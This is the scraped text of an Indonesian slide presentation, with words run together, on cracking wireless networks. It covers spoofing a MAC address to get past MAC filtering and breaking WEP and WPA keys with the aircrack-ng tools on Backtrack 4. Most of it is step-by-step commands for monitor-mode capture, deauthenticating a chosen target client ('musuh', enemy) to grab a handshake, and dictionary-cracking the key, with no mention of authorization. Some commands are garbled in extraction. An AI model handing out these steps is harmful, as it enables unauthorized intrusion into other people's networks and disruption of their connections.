cracking MAC, WEP & WPA4. Perangkat yang digunakan Backtrack 4 : salahsatudistrolinux (Download: http://www.remote-exploit.org ) Airmon-ng : detect, manage wireless card Airodump-ng : scanning wireless card Aireplay-ng : arp request, flooding Aircrack-ng : decrypt key 6. LangkahKerja 1Manipulasi Mac filtering 1. Wireless Device identifikasi Airmon-ng 2. Menonaktifkan interface wireless card Airmon-ng stop [interfece] 3. Menggantimac address macchanger --mac 11:22:33:44:55:66 [device] 4. Melihatmac address yang sudahterganti if config -a 7. Let’s do it Tutorial bisadilihatdihttp://thew0rd.com/2008/08/19/tutorial-cracking-wep-using-backtrack-3/ kitajugadapatmenggunakanaplikasibernama k-macuntukmemanipulasimac www.neset.com 8. Cracking WEP key Aktifkan mode monitor Airmon-ng start [device] JalankanAirodump-ng (scanning wireless card) airodump-ng --channel X --write nama_file_capture interface Jalankanaireplay (arp request, flooding) aireplay-ng --deauth X –a BSSID_akses_point -c Mac Address target interface Jalankanaircrack-ng (decrypt key) $ aircrack-ng nama_file_capture.cap 9. Let's crack it! Tutorial bisadilihatdihttp://thew0rd.com/2008/08/19/tutorial-cracking-wep-using-backtrack-3/ 10. Cracking WPA key Wireless Device identifikasi #airmon-ng Hidupkan Mode Monitor #airmon-ng stop [interface] (menghapus modus monitor) #airmon-ng start [interface] (mulai mode monitor) Siapa yang online? #airodump-ng -w nama_file [interface] Pilihmusuh # airodump-ng --channel X --write nama_file_capture [interface] Menunggu Handshake! # aireplay-ng -0 1-a [Ap_Mac]-c [Mac_Client] [interface] Crack kuncinya! # aircrack-ng -0 –x 2 - w Kamus File FILE.cap